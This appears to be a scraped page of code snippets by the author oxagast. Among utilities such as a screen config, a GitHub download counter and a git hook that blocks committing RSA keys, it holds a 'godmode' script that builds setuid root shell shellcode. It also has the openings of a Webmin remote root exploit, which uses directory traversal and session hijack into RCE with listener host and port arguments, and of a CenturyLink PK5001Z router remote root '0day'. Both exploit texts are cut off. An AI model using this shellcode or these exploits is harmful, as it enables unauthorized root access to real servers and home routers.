oxagast

#include "stdio.h"
#include "string.h"
void test_op(unsigned char was, unsigned char expected) {
  printf("%c", was);
}
int main(int argc, char *argv[]) {
  if ((argc > 1) && (argc < 3)) {
    char ui[10];
    for (int uia=0; uia<6; uia++) {
      ui[uia] = argv[1][uia];

oxagast

echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546

oxagast

//    __ _  _  __   ___  __  ____ ____
//   /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
//  (  O )  (/    ( (_ /    \___ \ )(
//   \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square

#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>

oxagast

### godmode by oxagast ###
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
gcc sc.c -o godmode;
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" |  cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
echo -n "char shellcode[] =  "
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
echo ";";
rm sc.c godmode;

oxagast

rm page_part 2>/dev/null;
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/   C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
rm ips_tomac ips_tomac2 macs_resolved page_part

oxagast

#!/bin/bash
# alias "git"='~/.git_check_rsa.sh'
if [ "$(find . -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep 'BEGIN RSA' | head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then
echo RSA KEY FOUND!;
echo Not adding to git.;
exit 1;
else
git $@
fi

oxagast

REPO=ansvif; GITUSER=oxagast; curl -s https://api.github.com/repos/$GITUSER/$REPO/releases | grep download_count | sed -e 's/.*: //' -e 's/,/ + /' | tr -d '\n' | sed -e 's/+ $/\n/' | bc | tr -d '\n' ; echo " All time clones of $REPO."

oxagast

HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"

oxagast

startup_message off
#idle 1800 lockscreen
vbell off
msgwait 2
defscrollback 15000
defutf8 on
shell bash
shelltitle "$ |bash"
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
bind = resize =

oxagast

/*  PK5001Z CenturyLink Router/Modem remote root exploit                  */
/*             oxagast / Marshall Whittaker                               */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin                     */
/* PK5001Z CenturyLink Router remote root 0day                            */
/* Enjoy!                                                                 */
/*   --oxagast                                                            */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1         */
/*                                                                        */
/* # uname -a; id;                                                        */